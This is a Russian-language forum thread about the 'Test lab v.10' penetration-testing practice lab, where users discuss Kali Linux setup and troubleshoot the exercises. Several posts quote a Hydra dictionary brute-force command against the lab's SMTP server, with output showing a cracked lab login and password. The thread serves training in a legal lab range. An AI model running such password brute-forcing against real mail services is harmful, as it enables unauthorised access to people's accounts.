Лаборатория тестирования на проникновение «Test lab v.10» — за гранью хакерских возможностей (1)

[<~DarkNode~>]

смотрел видео, где найти программы которыми он пользуется : kali VWware workstation, и программа DVL

Для начала берешь открываешь гугл,пишешь там

Что такое Kali Linux

Открываешь первыю ссылку.
Читаешь очень внимательно,очень очень внимательно!!!
Только потом может приступить к поиску этой программы.

Это будет твой первы квест)

Сразу же после того как справишся со своим первым квестом,можешь приступить ко второму
Так же ,берешь открываешь гугл:
И ищещь там

Как установить Kali Linux на виртуальную машину

После того как справишся - можешь смело задавать любые вопросы по теме))) Я на них с радостью отвечу ;-)

 

[sergeyxz]

v!l@a#dos
Вот здесь видео для начало https://vk.com/fave?section=likes_posts&w=wall-79831840_12129
для общего понимания....

 

[v!l@a#dos]

v!l@a#dos
Вот здесь видео для начало ***Скрытый текст***
для общего понимания....

чтобы посмотреть это видео нужно иметь 30 симпатии, а у меня 0 ))

 

[sergeyxz]

чтобы посмотреть это видео нужно иметь 30 симпатии, а у меня 0 ))

На youtube пользователь fromsmolensk плейлист информационная безопасность. подобных полно в сети[

 

[sdfsd]

Хай ребя!! А брут походу уже не канает.Похоже что iptables-ом задропили

очень долго вот эт

# hydra -L users.txt -P /home/admin/john/run/password.lst -f -o  good.txt smtp://192.168.101.9Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2016-12-27 13:36:53
[DATA] 16 tasks, 1 server, 10677 login tries (l:3/p:3559), ~667 tries per task
[DATA] attacking service smtp on port 25
Process 24313: Can not connect [timeout], process exiting
Process 24311: Can not connect [timeout], process exiting
Process 24317: Can not connect [timeout], process exiting
Process 24314: Can not connect [timeout], process exiting
Process 24316: Can not connect [timeout], process exiting
Process 24315: Can not connect [timeout], process exiting
[STATUS] 225.00 tries/min, 225 tries in 00:01h, 10452 todo in 00:47h
Process 24319: Can not connect [timeout], process exiting
Process 24321: Can not connect [timeout], process exiting
Process 24320: Can not connect [timeout], process exiting
Process 24322: Can not connect [timeout], process exiting
Process 24324: Can not connect [timeout], process exiting
Process 24325: Can not connect [timeout], process exiting

 

[<~DarkNode~>]

Хай ребя!! А брут походу уже не канает.Похоже что iptables-ом задропили

очень долго вот эт

# hydra -L users.txt -P /home/admin/john/run/password.lst -f -o good.txt smtp://192.168.101.9Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra ( link removed) starting at 2016-12-27 13:36:53
[DATA] 16 tasks, 1 server, 10677 login tries (l:3/p:3559), ~667 tries per task
[DATA] attacking service smtp on port 25
Process 24313: Can not connect [timeout], process exiting
Process 24311: Can not connect [timeout], process exiting
Process 24317: Can not connect [timeout], process exiting
Process 24314: Can not connect [timeout], process exiting
Process 24316: Can not connect [timeout], process exiting
Process 24315: Can not connect [timeout], process exiting
[STATUS] 225.00 tries/min, 225 tries in 00:01h, 10452 todo in 00:47h
Process 24319: Can not connect [timeout], process exiting
Process 24321: Can not connect [timeout], process exiting
Process 24320: Can not connect [timeout], process exiting
Process 24322: Can not connect [timeout], process exiting
Process 24324: Can not connect [timeout], process exiting
Process 24325: Can not connect [timeout], process exiting

пинг проверь.
Все отлично работает:

[ATTEMPT] target 192.168.101.9 - login "a.modlin@gds.lab" - pass "hello" - 24 of 3546 [child 7] (0/0)
[ATTEMPT] target 192.168.101.9 - login "a.modlin@gds.lab" - pass "ranger" - 25 of 3546 [child 8] (0/0)
[ATTEMPT] target 192.168.101.9 - login "a.modlin@gds.lab" - pass "shadow" - 26 of 3546 [child 10] (0/0)
[25][smtp] host: 192.168.101.9   login: a.modlin@gds.lab   password: justdoit
[STATUS] attack finished for 192.168.101.9 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-12-27 16:27:30

 

[sdfsd]

ping v poryadke

bash-4.2# ping 192.168.101.9
PING 192.168.101.9 (192.168.101.9) 56(84) bytes of data.
64 bytes from 192.168.101.9: icmp_seq=9 ttl=62 time=134 ms
64 bytes from 192.168.101.9: icmp_seq=10 ttl=62 time=132 ms
64 bytes from 192.168.101.9: icmp_seq=11 ttl=62 time=132 ms
64 bytes from 192.168.101.9: icmp_seq=12 ttl=62 time=133 ms
64 bytes from 192.168.101.9: icmp_seq=13 ttl=62 time=128 ms
64 bytes from 192.168.101.9: icmp_seq=14 ttl=62 time=136 ms
64 bytes from 192.168.101.9: icmp_seq=15 ttl=62 time=134 ms
64 bytes from 192.168.101.9: icmp_seq=16 ttl=62 time=127 ms
64 bytes from 192.168.101.9: icmp_seq=17 ttl=62 time=138 ms
^C

a na moey storone DROP mozet kosyachit ??

 

[sdfsd]

Hi people !!!!
теперь на виртуалке решил попробовать и больше часа ждал результата нема

what's that!!!!!

 

[<~DarkNode~>]

Посмотреть вложение 8290 Посмотреть вложение 8290 Посмотреть вложение 8290
Hi people !!!!
теперь на виртуалке решил попробовать и больше часа ждал результата нема

what's that!!!!!

Все в порядке.Дождись пока она отработает.

 

[xalanxmillerx]

Все)
Я взял 3-е место_
Мой второй ник Mister_Bert0ni

а канал в ютюбе один?)
[doublepost=1483126826,1483126083][/doublepost]

@~~DarkNode~~ ты реально мастер!
Очень круто!

А как ты догадался, что надо искать что-то в исходниках страницы?
Многие годы практики и опыта или случайно нашел?

логически рассуждая - первое куда надо заглянуть это код страницы, второе гит хаб) и тд...
[doublepost=1483127502][/doublepost]

Для начала берешь открываешь гугл,пишешь там

Открываешь первыю ссылку.
Читаешь очень внимательно,очень очень внимательно!!!
Только потом может приступить к поиску этой программы.

Это будет твой первы квест)
Посмотреть вложение 8218
Сразу же после того как справишся со своим первым квестом,можешь приступить ко второму
Так же ,берешь открываешь гугл:
И ищещь там

После того как справишся - можешь смело задавать любые вопросы по теме))) Я на них с радостью отвечу ;-)

lol

 

[Nak@cik]

Приветствую. У меня проблема с Гидрой. Все сделал как вы указывали, но она больше 25 мин. и ничего
[doublepost=1483804418,1483799731][/doublepost]Все получилось. Главное терпение. Я получил свой токен

 

[Sinistra]

~~DarkNode~~, спасибо за статью! Застопорился на детской ошибке, теперь токен взят

 

[barbandur]

Автору огромное уважение за информацию!

 

[mastanggt]

А как ты понял что нужно брутить 25 порт?
т.е. мы зашли на 8100, у видели что есть почта и сами додумали что smtp должен быть открыт?
Просто в nmap'е 25 порт закрыт же, но ты все равно сам решил что нужно брутить его.

 

[Kareon07]

Статья отличная, спасибо за труды!

 

[jena65535]

Была небольшая проблема со соединением и пароль по словарю подбирасля долго, а так вроде получилось)

 

[сергей799]

через какой терминал это все вводить
[doublepost=1484840633,1484839672][/doublepost]можете ответить?

 

[jena65535]

через какой терминал это все вводить
[doublepost=1484840633,1484839672][/doublepost]можете ответить?

В Kali стандартный термнал)

 

[сергей799]

не получается!

 

[jena65535]

не получается!

Что не получаеться, какая команда?